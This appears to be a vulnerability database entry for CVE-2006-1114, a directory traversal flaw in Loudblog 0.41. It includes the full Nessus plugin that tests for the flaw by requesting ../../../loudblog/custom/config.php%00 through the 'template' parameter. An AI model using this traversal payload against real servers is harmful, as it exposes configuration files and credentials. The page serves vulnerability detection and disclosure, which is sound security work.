Vulnerabilities > CVE-2006-1114 - Input Validation vulnerability in Gerrit VAN Aaken Loudblog 0.41

047910
CVSS 6.4 - MEDIUM
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
NONE
network
low complexity
gerrit-van-aaken
nessus
exploit available

Summary

Multiple directory traversal vulnerabilities in Loudblog before 0.42 allow remote attackers to read or include arbitrary files via a .. (dot dot) and trailing %00 (NULL) byte in the (1) template and (2) page parameters in (a) index.php, and the (3) language parameter in (b) inc/backend_settings.php. This vulnerability affects Loudblog versions 0.41 and previous.

Vulnerable Configurations

Part Description Count
Application
Gerrit_Van_Aaken
1

Exploit-Db

  • descriptionLoudBlog 0.41 index.php template Parameter Traversal Arbitrary File Access. CVE-2006-1114. Webapps exploit for php platform
    idEDB-ID:27369
    last seen2016-02-03
    modified2006-03-07
    published2006-03-07
    reportertzitaroth
    sourcehttps://www.exploit-db.com/download/27369/
    titleLoudBlog 0.41 index.php template Parameter Traversal Arbitrary File Access
  • descriptionLoudBlog 0.41 backend_settings.php language Parameter Traversal Arbitrary File Access. CVE-2006-1114. Webapps exploit for php platform
    idEDB-ID:27370
    last seen2016-02-03
    modified2006-03-07
    published2006-03-07
    reportertzitaroth
    sourcehttps://www.exploit-db.com/download/27370/
    titleLoudBlog 0.41 backend_settings.php language Parameter Traversal Arbitrary File Access

Nessus

NASL familyCGI abuses
NASL idLOUDBLOG_042.NASL
descriptionThe remote host is running Loudblog, a PHP application for publishing podcasts and similar media files. The version of Loudblog installed on the remote host fails to sanitize input to the
last seen2020-06-01
modified2020-06-02
plugin id21024
published2006-03-08
reporterThis script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.
sourcehttps://www.tenable.com/plugins/nessus/21024
titleLoudblog < 0.42 template Parameter Traversal
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description) {
  script_id(21024);
  script_version("1.19");

  script_cve_id("CVE-2006-1114");
  script_bugtraq_id(17023);

  script_name(english:"Loudblog < 0.42 template Parameter Traversal");
  script_summary(english:"Tries to read Loudblog's config file");
 
 script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP application that suffers from an
information disclosure vulnerability." );
 script_set_attribute(attribute:"description", value:
"The remote host is running Loudblog, a PHP application for publishing
podcasts and similar media files. 

The version of Loudblog installed on the remote host fails to sanitize
input to the 'template' parameter of the 'index.php' script before
returning the contents of the file in a dynamic web page.  An
unauthenticated attacker can exploit this issue to view arbitrary
files on the affected system subject to the privileges of the web
server user id. 

In addition, there reportedly is also a local file include flaw
involving the 'language' and 'page' parameters of the
'inc/backend_settings.php'and 'index.php' scripts and a SQL injection
flaw involving the 'id' parameter of the 'podcast.php' script, although
Nessus has not tested for these other issues. 

Successful exploitation of these issues reportedly requires that PHP's
'magic_quotes_gpc' be disabled." );
 script_set_attribute(attribute:"see_also", value:"https://www.securityfocus.com/archive/1/426973/30/0/threaded" );
 script_set_attribute(attribute:"see_also", value:"http://web.archive.org/web/20061212174522/http://www.loudblog.de:80/forum/viewtopic.php?id=592" );
 script_set_attribute(attribute:"solution", value:
"Upgrade to Loudblog 0.42 or later." );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:N");
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2006/03/08");
 script_set_attribute(attribute:"vuln_publication_date", value: "2006/03/07");
 script_cvs_date("Date: 2018/11/15 20:50:17");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();


  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  script_require_keys("www/PHP");
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("data_protection.inc");

port = get_http_port(default:80, embedded: 0);
if (!can_host_php(port:port)) exit(0);

# Loop through directories.
if (thorough_tests) dirs = list_uniq(make_list("/loudblog", "/podcast", "/podcasts", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
  # Grab config.php.
  file = "../../../loudblog/custom/config.php";
  w = http_send_recv3(method:"GET", 
    item:string(
      dir, "/index.php?",
      "template=", file, "%00"
    ), 
    port:port
  );
  if (isnull(w)) exit(1, "The web server on port "+port+" did not answer");
  res = w[2];

  # There's a problem if...
  if (
    # it looks like Loudblog and...
    "Loudblog built this page" >< res &&
    # it looks like the config file.
    "$lb_path" >< res
  ) {
    content = res - strstr(res, "<!-- Loudblog built this page");
    if (isnull(content)) content = res;

    report = string(
      "\n",
      "Here are the contents of Loudblog's config file that\n",
      "Nessus was able to read from the remote host :\n",
      "\n",
      data_protection::sanitize_user_full_redaction(output:content)
    );

    security_warning(port:port, extra:report);
    exit(0);
  }
}